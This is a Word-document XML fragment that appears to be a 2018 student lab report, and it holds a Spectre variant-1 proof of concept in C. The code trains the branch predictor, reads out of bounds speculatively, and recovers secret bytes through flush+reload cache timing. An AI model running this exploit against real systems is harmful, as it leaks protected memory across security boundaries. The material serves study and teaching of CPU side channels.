    <w:p w14:paraId="3DBCA99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 _mm_clflush(&amp;array[i*4096 +DELTA]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C33B7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21CDC2E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6DBB4DB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static int scores[256];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A0727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void reloadSideChannelImproved()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3754201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3160CD0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int i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A767B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volatile uint8_t *addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56433C0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register uint64_t time1, time2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C62191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int junk = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68F3E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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7760A98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addr = &amp;array[i * 4096 + DELTA];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525448A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time1 = __rdtscp(&amp;junk);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067419E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junk = *addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1216E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time2 = __rdtscp(&amp;junk) - time1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64052B9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if (time2 &lt;= CACHE_HIT_THRESHOLD &amp;&amp; i != 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565A52F"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scores[i]++; /* if cache hit, add 1 for this value */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177EBC7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740FEFA6"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2269A0C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4949B44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void spectreAttack(size_t larger_x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B96EF2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58616456"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int i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5327C9"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uint8_t s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302A1D1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volatile int z;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AABCC3B"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  { _mm_clflush(&amp;array[i*4096 + DELTA]); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6E67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Train the CPU to take the true branch inside victim().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68839CA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10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1D621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_mm_clflush(&amp;buffer_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E493219"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(z = 0; z &lt; 100; z++) { }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4913BAD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restrictedAccess(i);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F33760"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A027F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Flush buffer_size and array[] from the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082A9451"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_mm_clflush(&amp;buffer_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6488898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  { _mm_clflush(&amp;array[i*4096 + DELTA]); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65107F9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 Ask victim() to return the secret in out-of-order execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FBC09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(z = 0; z &lt; 100; z++) { }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09190B1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s = restrictedAccess(larger_x);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA88AF"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array[s*4096 + DELTA] += 88;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EA5E92"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7E3AB4F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p>
    <w:p w14:paraId="2D3D7532"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int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C5D69B"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int i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6D12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uint8_t s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57536F2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size_t larger_x = (size_t)(secret-(char*)buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DC3A22"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for(int a=0; a&lt;17; a++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AEF3B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flushSideChannel();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C839EE"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for(i=0;i&lt;256; i++) scores[i]=0; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27630467"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1000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CACABF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spectreAttack(larger_x+a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274D5C86"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reloadSideChannelImproved();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE352F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F21F0C"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int max = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E0959"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for (i = 0; i &lt; 256; i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D943B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if(scores[max] &lt; scores[i])  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E07C003"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max = i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E0894"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C1FA3" w14:textId="22D2018F"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printf("Reading secret value at %p = ", (void*)larger_x</w:t>
      </w:r>
      <w:r w:rsidR="00C33D1E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A763CE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D66C16"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printf("The  secret value is %d %c\n", max, max);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FD407D"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printf("The number of hits is %d\n", scores[max]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429FD39A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08858CC5"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 xml:space="preserve">  return (0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06762288" w14:textId="77777777" w:rsidR="00A763CE" w:rsidRPr="00A763CE" w:rsidRDefault="00A763CE" w:rsidP="00A763CE">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A763CE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F36A0F5" w14:textId="5DC99711" w:rsidR="00A763CE" w:rsidRPr="006620D4" w:rsidRDefault="00A763CE" w:rsidP="00A763CE">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643B197F" w14:textId="77777777" w:rsidR="00A763CE" w:rsidRPr="00C7088D" w:rsidRDefault="00A763CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A763CE" w:rsidRPr="00C7088D"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899"/>
    <w:rsid w:val="00044EB6"/>
    <w:rsid w:val="0005229D"/>
    <w:rsid w:val="000559D2"/>
    <w:rsid w:val="000576FA"/>
    <w:rsid w:val="00060D4A"/>
    <w:rsid w:val="00073B91"/>
    <w:rsid w:val="000C12E8"/>
    <w:rsid w:val="000F0CAA"/>
    <w:rsid w:val="0013688A"/>
    <w:rsid w:val="001C536C"/>
    <w:rsid w:val="001D2E0A"/>
    <w:rsid w:val="002043AC"/>
    <w:rsid w:val="0021471E"/>
    <w:rsid w:val="002353FB"/>
    <w:rsid w:val="00246203"/>
    <w:rsid w:val="0027662B"/>
    <w:rsid w:val="00281E86"/>
    <w:rsid w:val="002B78E0"/>
    <w:rsid w:val="003E5C02"/>
    <w:rsid w:val="00410FBD"/>
    <w:rsid w:val="004165BF"/>
    <w:rsid w:val="00424886"/>
    <w:rsid w:val="0043276E"/>
    <w:rsid w:val="00463270"/>
    <w:rsid w:val="0047007B"/>
    <w:rsid w:val="004869BB"/>
    <w:rsid w:val="004E5360"/>
    <w:rsid w:val="005377A1"/>
    <w:rsid w:val="0055354B"/>
    <w:rsid w:val="00575113"/>
    <w:rsid w:val="0059651F"/>
    <w:rsid w:val="005E1AFA"/>
    <w:rsid w:val="006620D4"/>
    <w:rsid w:val="006B27F2"/>
    <w:rsid w:val="006B3052"/>
    <w:rsid w:val="00704B4F"/>
    <w:rsid w:val="007678F6"/>
    <w:rsid w:val="007770FF"/>
    <w:rsid w:val="00821FC1"/>
    <w:rsid w:val="008265BC"/>
    <w:rsid w:val="00831B5C"/>
    <w:rsid w:val="00847BD0"/>
    <w:rsid w:val="00883CF0"/>
    <w:rsid w:val="00884FD6"/>
    <w:rsid w:val="008B4507"/>
    <w:rsid w:val="008E2660"/>
    <w:rsid w:val="009318D8"/>
    <w:rsid w:val="00952650"/>
    <w:rsid w:val="009676CC"/>
    <w:rsid w:val="00982066"/>
    <w:rsid w:val="00A06899"/>
    <w:rsid w:val="00A33FE7"/>
    <w:rsid w:val="00A6203A"/>
    <w:rsid w:val="00A706DB"/>
    <w:rsid w:val="00A763CE"/>
    <w:rsid w:val="00A87F72"/>
    <w:rsid w:val="00A95CBC"/>
    <w:rsid w:val="00AE26B3"/>
    <w:rsid w:val="00B55C6F"/>
    <w:rsid w:val="00B67293"/>
    <w:rsid w:val="00BB262A"/>
    <w:rsid w:val="00BC3EB1"/>
    <w:rsid w:val="00C329C7"/>
    <w:rsid w:val="00C33D1E"/>
    <w:rsid w:val="00C7088D"/>
    <w:rsid w:val="00CA5522"/>
    <w:rsid w:val="00CD37E5"/>
    <w:rsid w:val="00CF387B"/>
    <w:rsid w:val="00CF40E0"/>
    <w:rsid w:val="00E02695"/>
    <w:rsid w:val="00ED438C"/>
    <w:rsid w:val="00EF5FB9"/>
    <w:rsid w:val="00F022E6"/>
    <w:rsid w:val="00F116FD"/>
    <w:rsid w:val="00F77A98"/>
    <w:rsid w:val="00F81B00"/>
    <w:rsid w:val="00F92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FFD30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0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73B91"/>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34040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12</Pages>
  <Words>1661</Words>
  <Characters>9472</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58</cp:revision>
  <cp:lastPrinted>2018-10-22T16:58:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-12T23:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-22T16:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>